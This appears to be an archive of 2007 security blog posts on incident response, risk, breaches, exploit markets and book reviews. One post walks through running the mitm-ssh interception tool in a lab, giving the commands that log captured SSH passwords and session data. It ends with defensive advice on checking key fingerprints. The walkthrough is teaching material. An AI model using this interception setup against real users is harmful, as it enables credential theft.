  • Hackers insist on tools that let them examine the full state of the system across interface layers and modify this state, bypassing the standard development API. If such tools do not exist, developing them becomes a top priority... Interest in the internal workings of various programming language mechanisms is characteristic of the hacker approach.


Let's contrast these hacker characteristics with this "Hot Jobs" column I found in CIO Magazine:

Hot Jobs: Windows Administrator

Job Description: A network administrator who is primarily concerned with software and whose responsibilities include security, implementing network policy, managing user access and network troubleshooting, as well as designing, installing, configuring, administering, and fine-tuning Windows operating systems and components across an organization. Some career experts say the evolution of IT’s business role makes this job a possible career path to CIO.
(emphasis added)

Stopped laughing yet? It gets better:

Desired Skills: Knowledge of Windows Server 2003, Microsoft Exchange, domain and configuration controllers, global catalogs, LDAP (Lightweight Directory Access Protocol) and Active Directory. Minimum education is two-year degree in computer science; general business degree with software training also valuable.

This is an entry-level position that requires a two-year CS degree... or a business degree? This is mentioned elsewhere:

This is a job where an employer can bring in people with a basic degree in computer science or a degree in business with a computer background and grow their own to a greater extent than some other areas. (emphasis added)

I realize this is CIO Magazine, advocate of the multitalented specialist, but please.

In one corner, the hacker. In the other, the person with a "degree in business with a computer background." Who is going to win here? If I'm going to hire a Windows administrator, I don't care whether he/she has a degree, let alone a business degree. I want a person who can administer Windows.

This "business focus" is getting way out of hand. CIO, absolutely. CISO, yes. Directors, to some degree. Front-line administrators? Forget it. I want technical domain knowledge. Why do I not see financial people being told to get CS degrees with a financial background? After all, they use computers?

Abe Singer Highlights from USENIX Class

I didn't get to attend Abe Singer's talk Incident Response either, but again I managed to get a copy of his slides. They confirmed what I planned to do with my new company CIRT (fortunately), but I wanted to highlight some elements that I hadn't given much thought until I saw them in Abe's slides.

Abe pointed out that it's important to have incident response policies in place prior to an incident. I had always thought in terms of a plan, tools, and team, but not policies. Let me list a few items to explain.

Using language Abe secured for his university as a template, I plan to try to gain approval for something like this as a blanket incident detection and response policy at my company:

The Director of Incident Response and authorized designees have the authority to take actions necessary to contain, detect, and respond to computer incidents involving company assets.

These actions will be consistent with company policies and applicable laws.


Please note the original language said "prevent" instead of "contain," but my company has a separate security services arm. "Contain," as in "limit the damage," is more appropriate for my team's scope.

Abe also recommends explicit policies for the following:

  • Monitoring

  • Data collection and retention (I would add destruction too)

  • Node blocking and disconnection

  • Account suspension

  • Password changes

  • Reinstallation

  • Data sharing


Abe's point is that pre-coordination is essential to giving the CIRT the ability to rapidly execute its response and containment mission during an incident. Signing these policies also sets expectations for the businesses as CIRT customers.

Marcus Ranum Highlights from USENIX Class

Because I was teaching at USENIX Security this month I didn't get to attend Marcus Ranum's tutorial They Really Are Out to Get You: How to Think About Computer Security. I did manage to read a copy of Marcus' slides.

Because he is one of my Three Wise Men of digital security, I thought I would share some of my favorite excerpts. Some of the material paraphrases his slides to improve readability here.

  • Marcus asked how can one make decisions when likelihood of attack, attack consequences, target value, and countermeasure cost are not well understood. His answer helps explain why so many digital security people quote Sun Tzu:

    The art of war is a problem domain in which successful practitioners have to make critical decisions in the face of similar intangibles.

    I would add that malicious adversaries are present in war but absent from many scenarios misapplied to security, such as car analogies, where no intelligent opponent is working against you.

  • Marcus continues this thought by contrasting "The Warrior vs The Quant":

    Statistics and demographics (i.e., insurance industry analysis of automobile driver performance by group) [fail in digital security] because there is no enemy perturbing the actuarial data... and "perturbing your likelihoods" is what an enemy does! It's "innovation in attack or defense." (emphasis added)

  • Marcus offers two definitions for security which I may quote in the future:

    A system is secure when it behaves as expected; no less and certainly no more.

    A system is secure when the amount of trust we place in it matches its trustworthiness.

  • Marcus debunks the de-perimeterization movement by explaining that a perimeter isn't just a security tool:

    A perimeter is a complexity management tool.

    In other words, a perimeter is a place where one makes a stand regarding what is and what is not allowed. I've also called that a channel reduction tool.

  • Here's an incredible insight regarding the many "advanced" inspection and filtering devices that are supposed to be adding "security" by "understanding" more about the network and making blocking decisions:

    At a certain point the complexity [of the firewall/filter] makes you just as likely to be insecure as the original application.

    He says you're replacing "known bugs" (in the app) with "unknown bugs" (in the "prevention" device).

  • I love this point:

    Insiders and counter-intelligence: What to do about insider threat?

    • Against professionals: lose

    • Against idiots: IDS (Idiot Detection System) works; detect stupidity in action


    This is so true. I'd extend the "idiot" paradigm further by adding EDS (Eee-diot Detection System). (Cue "Stimpy, you eee-diot!" if you need pronunciation help here.)

  • Finally, Marcus slams the idea that one can use an equation to quantify risk. He calls "Risk = Threat X Vulnerability X Asset Value" one wild guess times another wild guess times another wild guess. I agree with this but I would say the concept of separating out those variables helps one understand how Risk changes as one variable changes with the others held constant.

    Marcus also offers two approaches to dealing with risk:


    1. Think of all possible disasters, rank by likelihood, prepare for Top 10. (9/11 showed this doesn't work.)

    2. Build nimble response teams and command/control structures for fast and effective reaction to threats as they materialize.


    Regarding number one, Marcus obviously thinks that is a waste of time. However, one could argue that if policymakers had paid attention to the intelligence that was available and prepared, the situation could have been different. That's where threat intelligence on capabilities and intentions and attack patterns can be helpful for modeling attacks.

    Regarding number two, I am so pleased to read this. It's why I'm building a CIRT at my new job. This comment also resonates with something Gadi Evron said during his talk on the "Estonia Cyberwar":

    No one is judged anymore by how they prevent incidents. Everyone gets hacked. Instead, organizations are judged by how they detect, respond, and recover.
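My point about holding variables constant can be sketched numerically. The inputs below are, of course, exactly the wild guesses Marcus objects to; the only claim is that separating the terms makes the marginal effect of a change visible:

```python
def risk(threat, vulnerability, asset_value):
    # The classic (and much-criticized) multiplicative risk equation.
    return threat * vulnerability * asset_value

baseline = risk(threat=0.5, vulnerability=0.2, asset_value=100_000)
# Halving vulnerability with the other terms held constant halves risk,
# which at least exposes what a proposed countermeasure buys you:
patched = risk(threat=0.5, vulnerability=0.1, asset_value=100_000)
```

The absolute numbers are guesses, but the ratio between the two outcomes is not.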

Thursday, August 16, 2007

Breach Pain

Several stories involving companies victimized by intruders came to light at the same time. It's important to remember not to blame the victim, like the fool editor at Slashdot implied by writing Contractor Folds After Causing Breaches. The company in question, Verus Inc., didn't "cause breaches" -- it suffered them. Some bad guy stealing data caused the breaches. Read Medical IT Contractor Folds After Breaches at Dark Reading for the details.

New details on TJX came to light this week in stories like TJ Maxx Breach Costs Soar by Factor of 10 (Company had to absorb $118M of losses in Q2 alone) and The TJX Effect. The second article says this:

Poorly secured in-store computer kiosks are at least partly to blame for acting as gateways to the company's IT systems, InformationWeek has learned. According to a source familiar with the investigation who requested anonymity, the kiosks, located in many of TJX's retail stores, let people apply for jobs electronically but also allowed direct access to the company's network, as they weren't protected by firewalls. "The people who started the breach opened up the back of those terminals and used USB drives to load software onto those terminals," says the source. In a March filing with the Securities and Exchange Commission, TJX acknowledged finding "suspicious software" on its computer systems.

The USB drives contained a utility program that let the intruder or intruders take control of these computer kiosks and turn them into remote terminals that connected into TJX's networks, according to the source. The firewalls on TJX's main network weren't set to defend against malicious traffic coming from the kiosks, the source says. Typically, the USB drives in the computer kiosks are used to plug in mice or printers. The kiosks "shouldn't have been on the corporate LAN, and the USB ports should have been disabled," the source says.


You can expect me to advocate detection and rapid response, and I'm curious what this will produce: DARPA seeks innovations in network monitoring. Why isn't it "innovations in stopping attacks?" Because that doesn't work.

Speaking of Bad Guys

I wanted to bring a few threat-oriented stories to your attention if you hadn't seen them. I'm also recording them here because I abhor bookmarks.

It's important to remember that we're fighting people, not code. We can take away their sticks but they will find another to beat us senseless. An exploit or malware is a tool; a person is a threat.

Dark images like the alley on the right first described in Analog Security is Threat-Centric remind us how dangerous the Internet can be to our data, and potentially our lives.

  • Report: Web 'Mean Streets' Pervasive: This is a story about a great new Honeynet Project report on Malicious Web Servers. From the news story:

    If you still think avoiding risky sites keeps you safe on the Web, think again: Newly released research from the Honeynet Project & Research Alliance shows that even seemingly "safe" sites can infect you...

    The Honeynet Project also found that IE6 SP2 was the most likely browser version to get infected, versus Firefox 1.5.0 and Opera 8.0.0, so it really is safer to use one of these less-targeted browsers, according to the report.


    No one is safe, but survival rates increase when you differentiate yourself from the herd.

  • Newsmaker: DCT, MPack developer: So you want to know about the sorts of people feeding those malicious Web sites? Read this interview:

    [Question:] How do you get the exploits for MPack? Do you buy them?

    [Answer:] For our pack, there are two main methods of receiving exploits: The first one is guys sending us any material they find in the wild, bought from others or received from others; the second one is analyzing and improving public reports and PoC (proof-of-concept code).

    We sometimes pay for exploits. An average price for a 0-day Internet Explorer flaw is US$10,000 in case of good exploitation.


    I love reading interviews with bad guys.

  • Happy Birthday ZDI!: Speaking of buying exploits, David Endler posted a very interesting report on the status of the Tipping Point Zero Day Initiative. I found some of the comments from his vulnerability sources interesting:

    Q.) Would you consider doing business with the "underground" for more money?

    * Yes: 10% No: 90%

    Q.) If no, why not?

    * "A company already offered me to buy 0days for much more money but I declined this offer because I didn't know what they really wanted to do with that and at the end I don't think it will help to improve the security of the software industry."
    * "Although money wise it might be very tempting, legally and morally its not tempting at all, so No."
    * "At some point everybody could be bought, I guess. But that would have to be really a lot of more money. I will not work with criminals for ten, twenty or so times the money."
    * "I've thought about it, and got offers but no."


    I think these researchers have seen enough Sopranos episodes to know that when you start dealing with the criminal world, there's no getting out.

  • Even the hackers are nervous: John Borland from Threat Level writes:

    There's big money to be made by breaking into other computers these days, and digital mafias have long since stepped into the gap, replacing slipshod and amateur work with professional-grade coding. According to McAfee Avert Labs researcher Toralv Dirro, harvested credit card numbers are sold in batches of a thousand, for between $1 and $6 dollars for a U.S. card, or twice that for a British card...

    But everything will be fine as long as antivirus software is in place, right?

    Wrong, said researcher Sergio Alvarez. He demonstrated a debugging program that immediately found bugs in several different varieties of antivirus software, and said the same kind of problems were common throughout the industry.

    Most antivirus firms rush products out on tight deadlines, without the extremely sensitive debugging process that such critical software ought to have, he argued. That left virtually all security software open to attacks that take advantage of those bugs, opening a painful paradox for systems administrators.

    "The more you try to defend yourself, the more you're vulnerable to this kind of attack," Alvarez said.
    (emphasis added)

    That echoes the point I made in Black Hat USA 2007 Round-Up Part 2: Modern countermeasures applied to reduce vulnerability and/or exposure in many cases increase both vulnerability and exposure.

  • Malware: Serious Business: More great threat reporting:

    Speaking at DefCon 2007, Thomas Holt revealed the results of his study, "The Market for Malware." The study reflects research conducted over the last year on some 30 hacker forums and focuses on six of those forums, including those hosted in eastern Europe.

    "The idea was to go into the forums and find out how they work," says Holt...

    The average hackers' forum works much like a combination of eBay and a department store site, Holt reports...

    As sellers submit more workable exploits to testers and buyers, they build a reputation that makes it easier -- and more lucrative -- to sell their future exploits, Holt says...

    A typical exploit in a hacker forum can sell from less than $100 to more than $3,000, Holt says...

    Holt and his research team are about to embark on further study in which they will attempt to study the international market for exploits, and how the products themselves evolve as they are bought and sold.


    This is a side of the digital world hardly anyone sees, but it's there and we need to be aware of it.

  • Storm Worm's virulence may change tactics: Ninja Joe Stewart is interviewed and makes an interesting comment:

    From the number of infected machines he's found, Stewart estimates that the Storm botnet could comprise anywhere from 250,000 to 1 million infected computers. And that raises questions, along with eyebrows.

    "Why do you need a botnet that big?" he asks. "You don't need a million [infected computers] to send spam."


    Wow, someone is asking "why" for a change. Why indeed?

  • Cisco warns of critical IOS flaws: Yet more reasons to Monitor Your Routers.

  • Ten Things Your IT Department Won't Tell You: I was asked to comment on this article. You can already find The Surf At Work Page and HTTP-Tunnel (a "corporate" product!) or HTTPTunnel@JUMPERZ.NET. I disliked the tone of the article, but it's important for security people to recognize that the majority of the user base sees us as impediments and not knights in shining armor.

  • Back to School: Backpacks, Books & Bots: Finally, a reminder that universities tend to get hammered in the fall:

    The latest strategy is to make security a "cool" thing on campus. "I can't solve every possible contingency with technology," says Quinnipiac's Kelly, who is also adding IPSs to the network in the next few days. "This year, we're focusing on cultural issues with security-awareness training."

    That means making security more personal, so the students don't just pay lip service to warnings about opening suspicious emails, or put their birthdates and physical addresses on their Facebook sites. "If I say, 'you need to update your AV,' they will say they don't care," Kelly says. "But when I say you could lose your work or your identity, they perk up and listen more."

    Of course, it can be a challenge to make security "cool" in a place where self-control is constantly tempted by new freedoms, new technology, and loads of free time.

    "College students today think they are computer geniuses. But they don't know what they don't know," says Richard Bunnell, senior security engineer with MassMutual Financial Group, which has an outreach program with nearby universities in New England to raise security awareness.
    (emphasis added)

    I almost fell out of my chair when I read that last paragraph.

Loving the SSH

I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.

How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.

Speaking of SSH, one of my Black Hat students brought an SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:

In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1

I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.

I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.

richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub

Once I log in you can see the fingerprints for both keys.

Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh

..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN

Usage: mitm-ssh [option(s)]

Routes:
<host>[:<port>] - Static route to port on host
(for non NAT connections)

Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read

Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied

Now I connect to localhost to show the correct key entered into known_hosts.

richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686

richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub

Now I connect to localhost port 2222 where mitm-ssh is listening.

richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri

I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:

$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub

Here is how mitm-ssh sees the activity.

WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22

[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

[MITM] Connection from UNKNOWN:48216 closed

Here's some of the info collected. First, usernames and passwords.

$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

Now data from the client.

$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22

Odd, it didn't record anything there. Here's (some) data from the server.

...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...

That file shows data from client and server.

Incidentally, SSH v1 is disabled on 10.1.13.4:

richard@neely:/tmp$ ssh -1 10.1.13.4
Protocol major versions differ: 1 vs. 2

In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.
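One way to make fingerprint changes harder to ignore is to record and compare them yourself. This is a minimal sketch (the helper names are mine) that computes the MD5-style fingerprint OpenSSH displays from a public key line in the known_hosts / *.pub format:

```python
import base64
import hashlib

def md5_fingerprint(pubkey_line):
    # pubkey_line is one line in the "ssh-dss AAAA... comment" format
    # used by known_hosts and /etc/ssh/ssh_host_*_key.pub files.
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def key_changed(recorded_fingerprint, pubkey_line):
    # True if the host now presents a key that does not match the
    # fingerprint recorded earlier -- a possible man in the middle.
    return md5_fingerprint(pubkey_line) != recorded_fingerprint
```

Comparing a freshly computed fingerprint against one recorded out-of-band is exactly the check mitm-ssh relies on victims skipping.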

Change the Plane

Call me militaristic, but I love the History Channel series Dogfights. I hope the Air Force Academy builds an entire class around the series.

I just finished watching an episode titled "Gun Kills of Vietnam." The show featured two main engagements. Both demonstrated a concept I described in Fight to Your Strengths. In the first battle two A-1H Skyraiders (prop planes) shot down a MiG-17 (a jet) using their cannons. The Skyraiders survived their initial encounter with the MiG by out-turning it at low speeds. They made the MiG fight their fight, and the MiG lost.

In the second battle, an F-4 flown by pilot Darrell "Dee" Simmonds and backseater George McKinney Jr. downed another MiG-17 using their gun. In that fight, the slower but more maneuverable MiG-17 was out-turning the F-4. In the show McKinney said a less experienced pilot would have fought the MiG's fight by trying to turn with the MiG, probably giving the MiG an opportunity to down the F-4 when the F-4 overshot it. Instead, a highly skilled pilot would act differently. In Simmonds' words:

You can not turn with him... you have to get into another plane.

The "plane" in this case is geometric, not the actual fighter plane. The F-4 leaves the X-Y plane and enters Z, the vertical plane. Simmonds put the F-4 into a "high yo-yo." The image above shows the technique, which can also be seen at the Dogfights clips page. Coming out of the yo-yo put the F-4 right behind the MiG, allowing Simmonds to shoot it down.

Of course this made me think about digital security. We are constantly trying to fight the black hat's fight. We should instead "change the plane." What does this mean in actionable terms? I'm not sure yet. Obviously in air combat it's not about surviving the enemy onslaught and never shooting back. Maybe it's time security researchers concentrate on vulnerabilities in the tools used by intruders, like what the Shmoo Group presented at Def Con 13, e.g., multihtml exploit vulnerability advisory? Ideally law enforcement would be striking back for us, but we're still in Wild West mode until LEAs catch up. What do you think -- how could you change the plane?

Tuesday, August 14, 2007

Scanning with Flash

Thanks to Rsnake I learned of a proof of concept for Flash scanning.



I had to enable JavaScript and have Adobe Flash installed. I used Firefox within Ubuntu 6.10. In the traffic you can see my host sending the following after finishing the three-way handshake.

09:31:34.348028 IP 192.168.2.8.44235 > 10.1.13.4.21:
P 1:24(23) ack 1 win 1460
0x0000: 4500 004b 1f24 4000 4006 41d4 c0a8 0208 E..K.$@.@.A.....
0x0010: 0a01 0d04 accb 0015 f31e fbd2 a8ce 608e ..............`.
0x0020: 8018 05b4 df9f 0000 0101 080a 0018 e4f5 ................
0x0030: ea84 369b 3c70 6f6c 6963 792d 6669 6c65 ..6.<policy-file
0x0040: 2d72 6571 7565 7374 2f3e 00             -request/>.
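That payload is the Flash runtime's socket policy probe. A self-contained sketch of a listener that recognizes it (the client half is simulated in-process here, and the port is ephemeral, chosen only for the demo):

```python
import socket

# The probe Flash sends when a SWF opens a raw socket; it is NUL-terminated.
PROBE = b"<policy-file-request/>\x00"

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("127.0.0.1", 0))            # ephemeral port for the demo
srv.listen(1)
port = srv.getsockname()[1]

# Simulate the scanning SWF's connection so the example runs standalone
cli = socket.create_connection(("127.0.0.1", port))
cli.sendall(PROBE)

conn, addr = srv.accept()
data = conn.recv(1024)
# Seeing this string on an arbitrary port is a signature of Flash-based scanning
is_flash_probe = data.startswith(b"<policy-file-request/>")
conn.close(); cli.close(); srv.close()
```

An IDS signature matching `<policy-file-request/>` on unexpected ports would catch the same behavior on the wire.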

More to come, I'm sure.

On a related note, read Same-Origin Policy Part 1: Why we’re stuck with things like XSS and XSRF/CSRF by Justin Schuh and XSRF^2 by Dan Kaminsky.

Monday, August 13, 2007

Note from Black Hat on ARP Spoofing Malware

During my classes I mentioned seeing a post on malware that performs ARP spoofing to inject malicious IFRAMEs on Web pages returned to anyone browsing the Web on the same segment. I found it -- ARP Cache Poisoning Incident by Neil Carpenter.
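The poisoning symptom is simple to state: an IP address, usually the gateway's, suddenly "moves" to a new MAC address. A toy sketch of that detection logic, fed simulated ARP replies rather than sniffed traffic (the addresses are invented):

```python
def detect_arp_flips(replies):
    """replies: iterable of (sender_ip, sender_mac) pairs from ARP replies.
    Returns a list of alert strings for any IP whose claimed MAC changes."""
    seen = {}
    alerts = []
    for ip, mac in replies:
        if ip in seen and seen[ip] != mac:
            alerts.append(f"{ip} changed from {seen[ip]} to {mac}")
        seen[ip] = mac
    return alerts

# The gateway's MAC flipping mid-session is the classic poisoning sign
sample = [
    ("10.1.13.1", "00:0c:29:aa:aa:aa"),  # legitimate gateway reply
    ("10.1.13.1", "00:0c:29:bb:bb:bb"),  # attacker claims the gateway IP
]
alerts = detect_arp_flips(sample)
```

Tools like arpwatch implement essentially this bookkeeping against live traffic.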

Thanks to Earl Crane for taking the picture of a few ex-Foundstoners who met after the talk by Keith Jones and Rohyt Belani.

Thursday, August 09, 2007

Reviews on Managing Cybersecurity Resources and Security Metrics Posted

Thanks to my travel to USENIX Security this week I managed to read two great non-technical security books.

Amazon.com just posted my four star review of Managing Cybersecurity Resources. From the review:

Managing Cybersecurity Resources (MCR) is an excellent book. I devoured it in one sitting on a weather-extended flight from Washington-Dulles to Boston. MCR teaches security professionals how to think properly about making security resource allocation decisions by properly defining terms, concepts, and models. The only problem I have with MCR is the reason I subtracted one star: its recommended strategy, cost-benefit analysis, relies upon estimated probabilities of loss and cost savings that are unavailable to practically every security manager. Without these figures, constructing cost-benefit equations as recommended by MCR is impossible in practice. Nevertheless, I still strongly recommend reading this unique and powerful book.

I heavily cite passages in Managing Cybersecurity Resources because the book makes a lot of good points. I call this more of a "book report" instead of a "review" because I recorded thoughts that I want to carry into future debates. The book has plenty to say on "security ROI" (hint: it's cost savings / loss avoidance, just like I said earlier).

They also posted my five star review of Security Metrics. From the review:

I read Security Metrics right after finishing Managing Cybersecurity Resources, a book by economists arguing that security decisions should be made using cost-benefit analysis. On the face of it, cost-benefit analysis makes perfect sense, especially given the authors' analysis. However, Security Metrics author Andy Jaquith quickly demolishes that approach (confirming the problem I had with the MCR plan). While attacking the implementation (but not the idea) of Annual Loss Expectancy for security events, Jaquith writes on p 33 "[P]ractitioners of ALE suffer from a near-complete inability to reliably estimate probabilities [of occurrence] or losses." Bingo, game over for ALE and cost-benefit analysis. It turns out the reason security managers "herd" (as mentioned in MCR) is that they have no clue what else to do; they seek safety in numbers by emulating peers and then claim that as a defense when they are breached.
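Jaquith's objection is easy to demonstrate with the ALE arithmetic itself (ALE = SLE × ARO). The figures below are invented for illustration; the point is how much the answer swings on a probability estimate nobody can actually support.

```python
def ale(single_loss_expectancy, annual_rate_of_occurrence):
    """Annual Loss Expectancy: expected yearly loss from one event type."""
    return single_loss_expectancy * annual_rate_of_occurrence

sle = 500_000  # hypothetical cost of a single breach

# Two defensible-sounding guesses at the yearly rate of occurrence
low = ale(sle, 0.05)   # "once in twenty years"
high = ale(sle, 0.5)   # "once in two years"

spread = high / low    # a 10x swing driven entirely by the guessed probability
```

With a 10x spread in the output from the probability guess alone, any cost-benefit comparison built on these numbers inherits the same uncertainty, which is the hole Jaquith identifies in ALE-based analysis.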

Speaking of USENIX, I managed to speak with my number one wise man, Marcus Ranum. He called my Black Hat posts "too optimistic." Heh. I also managed to speak with my number two wise man, Dan Geer. He was kind enough to sign my copy of Security Metrics (along with author Andy Jaquith and Mike Rothman, who lent us his Sharpie. Nice to meet you Mike!)

Wednesday, August 08, 2007

Must-Read Post on Virtualized Switches

While visiting Hoff's blog I saw his post VMware to Open Development of ESX Virtual Switches to Third Parties...Any Guess Who's First?. You must read this. The question I have, as with all new "features," is this: is visibility built in? Will I have access to a "virtual tap"? Can I trust it? We'll see.

Human Weapon

In FISMA Dogfights I mentioned my favorite show on the History Channel is Dogfights. A very close second, if not an equal, is the new series Human Weapon. I don't recall another regular television series devoted exclusively to martial arts. If you wonder why I bother posting about a martial arts show, see my post Fight to Your Strengths.

On a related subject, based on other stories in the security blogosphere, I expect to see a martial arts rumble at the next Black Hat in 2008. I better get my shoulder fixed and start training again.

CIO Magazine on IP Theft

CIO magazine, which features an impossible-to-navigate Web site but decent print version, published Hacked: The Rising Threat of Intellectual Property Theft and What You Can Do About It by Stephanie Overby. I liked these excerpts:

“There’s a ceiling on how much money can be made by stealing identities,” says Scott Borg, director and chief economist of the U.S. Cyber Consequences Unit, an independent nonprofit institute set up at the request of the federal government to examine the economic and strategic consequences of cyberattacks. “You can actually steal the business—its processes, its internal negotiating memos, its merchandising plans, all the information it uses to create value. That’s a very large payoff.”

I agree, but what's up with the USCCU Web site? I had to find an archive from February 2006 to see what this group does. Spend a little of that DHS money on a Web site, folks.

CIOs may be less aware of the threat to IP than to their systems, and therefore less prepared to protect the former. “Companies are thinking about worms and viruses, things that will not have very bad consequences and have always been wildly exaggerated,” says Borg. “Or they’re thinking about ID theft, which attracts a lot of attention, even though the number of cases is remarkably low.”

There’s a difference, too, in the systems an intruder looking for corporate secrets may target. IP thieves “won’t necessarily look at obvious financially sensitive areas,” says Borg, thereby escaping detection. “They may be looking at technical data, controls systems, automation software.” And the results of IP theft can be hard to see—a slow degradation of one’s competitive position in the market may easily be attributed to other, noncriminal factors.

Until recently, the most conclusive public evidence that sustained industrial espionage has taken place in cyberspace has come from the military. Titan Rain was “the most systematic and high-quality attack we have seen,” says Ira Winkler, author of, most recently, Zen and the Art of Information Security. Chinese hackers successfully breached hundreds of unclassified networks within the Department of Defense, its contractors and several other federal agencies. One Air Force general admitted at an IT conference last year that China had downloaded 10 to 20 terabytes of data from DoD networks.
(emphasis added)

Forget about "slow degradation." In some future war over the Taiwan Strait an American jet fighter is going to dogfight a Chinese plane and lose the battle because some sensitive design or technical data was stolen. This is a constant in warfare, as I mentioned in my post FISMA Dogfights.

To defend against targeted attacks, Motorola uses traditional controls such as firewalls, intrusion detection tools, antivirus software and digital forensics—but with a difference. “We’re operating our information security toolkit with a counterintelligence mind-set,” says Boni [Motorola CIO]. Like the military, Boni assumes there’s an enemy looking for an advantage and it’s his job to outwit him. “Putting those tools together with an understanding of what is or could be of greatest interest to competitors allows a more granular focus on the data,” says Boni, “not just on the network.”

Bingo. CI is exactly right.

“The thought process is no longer making sure nothing bad ever happens,” says DuBois [general manager of information security and infrastructure services security for Microsoft]. “There may be a bug in the Cisco code or someone might misconfigure a device. If [attackers] get at that chess piece we left unprotected, what will we do?”...

“If eternal vigilance is the price of freedom,” says Boni, paraphrasing Thomas Jefferson, “continuous monitoring and preparation to respond quickly is the cost associated with global digital commerce.”
(emphasis added)

Again, exactly right. Prevention Eventually Fails. Detection. Response. Hopefully more CIOs will pay attention.

Pervasive Security Monitoring

